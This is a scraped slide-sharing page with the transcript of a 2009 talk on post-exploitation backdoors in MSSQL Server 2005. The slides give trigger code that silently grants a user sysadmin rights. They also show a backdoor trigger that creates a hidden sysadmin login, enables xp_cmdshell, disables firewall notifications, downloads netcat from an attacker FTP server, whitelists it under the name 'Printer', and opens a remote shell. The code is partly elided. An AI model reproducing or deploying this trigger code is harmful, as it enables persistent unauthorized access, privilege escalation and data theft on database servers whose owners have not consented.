1 / 13

MSSql server 2005 backdoor

Duong Ngo October 14, 2009. MSSql server 2005 backdoor. POST-EXPLOITATION. Got access to a MSSQL box? (SQL injection, brute force…) Privileges: sa / dbo / normal user Got all data Now what’s next??. Backdoors. Provide easier access to the compromised box in the future

sol
Télécharger la présentation

MSSql server 2005 backdoor

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Duong Ngo October 14, 2009 MSSql server 2005 backdoor

  2. POST-EXPLOITATION • Got access to a MSSQL box? (SQL injection, brute force…) • Privileges: sa / dbo / normal user • Got all data • Now what’s next??

  3. Backdoors • Provide easier access to the compromised box in the future • Type of backdoors: OS backdoors (rootkits), Web server backdoor ( PHPshell, CGITelnet..) • So how’s about Database Backdoor?? YES!

  4. SQL Server 2005 Backdoor • We’ll create a backdoor based on SQLServer Trigger. • What’s Trigger?

  5. Database Trigger • Special kind of stored procedure that executes automatically when a user attempts the specified data-modification statement on the specified table (UPDATE, DELETE, INSERT..) • Trigger gets executed under the security context of whocaused trigger to fire!

  6. EXAMPLE – Create trigger Context: Normal User with Create Trigger permission: CREATE TRIGGER trg_gain_ privilege ON tblCustomers FOR INSERT, DELETE,UPDATE AS EXEC sp_addsrvrolemember @loginame ='Hacker', @rolename = N'sysadmin‘

  7. EXAMPLE – Trigger got fired • Context: sa (server admin) sa> DELETE * FROM tblCustomers • RESULT?? User: “Hacker” now become sysadmin

  8. What can we do with that? • Privilege escalation: normal user -> higher role • Database backdoor

  9. SQLServer Backdoor features: • - Execute subsequent commands if current user is 'sa‘ • - Enable xp_cmdshell • - Create new login 'backdoor' and add it to sysadmin server role. • - Disable firewall notification mode • - Add ftp to allowed programs list • - Get netcat from attacker ftp server • - Create a directory 'Backdoor_activated' in attacker ftp server to let attacker knows whenever the backdoor has been started. • - Open netcat in listen mode attached with sql command line client Osql.

  10. Our Backdoor’s Code CREATE TRIGGER trg_backdoor ON DATABASE FOR DDL_DATABASE_LEVEL_EVENTS AS BEGIN DECLARE @cur_uservarchar(200) …… CREATE LOGIN [backdoor] WITH PASSWORD = 'Backdoor123#' ; EXEC sys.sp_addsrvrolemember @loginame = N'Backdoor', @rolename =N'sysadmin' --disable firewall notification mode Exec master..xp_cmdshell 'netsh firewall set notifications disable‘ …..

  11. Why DL_DATABASE_LEVEL_EVENTS Because it consists of all below events: CREATE_TABLE ALTER_TABLE DROP_TABLE CREATE_VIEW ALTER_VIEW DROP_VIEW CREATE_SYNONYM DROP_SYNONYM CREATE_FUNCTION ALTER_FUNCTION DROP_FUNCTION CREATE_PROCEDURE ALTER_PROCEDURE DROP_PROCEDURE CREATE_TRIGGER ALTER_TRIGGER DROP_TRIGGER CREATE_EVENT_NOTIFICATION DROP_EVENT_NOTIFICATION …. ….

  12. Our Backdoor’s Code (cont) -- save ftp commands to an external file SET @cmd = 'echo GET ' + @fileget + ' >> ' + @cmdfile ….. -- execute ftp with commands loaded from the file we created SET @cmd = 'ftp -s:' + @cmdfile EXEC master..xp_cmdshell @cmd, NO_OUTPUT …… -- After get netcat, add netcat to firewall’s allowedprogram list SET @cmd = 'netsh firewall add allowedprogram program=' + @localdir + '\'+ @fileget + ' name=Printer mode=ENABLE scope=ALL profile=ALL'

  13. Thank You for listening!!

More Related